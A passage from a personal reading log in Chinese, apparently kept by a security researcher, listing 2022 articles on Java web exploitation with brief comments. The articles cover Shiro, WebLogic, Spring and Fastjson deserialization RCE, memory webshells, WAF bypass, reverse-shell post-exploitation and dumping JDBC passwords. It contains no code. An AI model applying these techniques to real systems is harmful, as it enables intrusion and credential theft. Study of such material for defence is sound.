emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** ++ 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** ++ 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** ++ 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** ++ 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** ++ 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** ++ 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** ++ 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** ++ 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** ++ 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** ++ 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) ++ 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** ++ 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** ++ 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) ++ 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** ++ 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** ++ 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** ++ 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** ++ 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) ++ 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** ++ 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** ++ 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** ++ 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** ++ 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** ++ 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) ++ 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) ++ 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** ++ 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** ++ 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** ++ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** ++ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) ++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** ++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** ++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** ++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) ++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** ++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** ++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** ++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** ++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** ++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** ++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) ++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** ++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) ++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** ++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** ++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** ++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** ++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** ++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** ++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** ++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** ++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) ++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) ++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** ++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** ++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** ++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** ++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** ++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** ++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) ++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** ++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** ++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) ++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) ++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) ++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) ++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) ++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** ++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** ++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** ++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) ++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** ++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** ++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) ++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) ++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) ++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** ++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) ++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) ++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) ++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) ++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) ++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) ++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 ++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** ++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) ++ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** ++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** ++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) ++ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** ++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) ++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** ++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** ++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** ++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** ++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** ++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** ++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** ++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** ++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** ++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** ++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* ++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) ++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) ++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 ++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** ++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** ++ 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) ++ 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** ++ 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** ++ 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/23 [漫谈 JEP 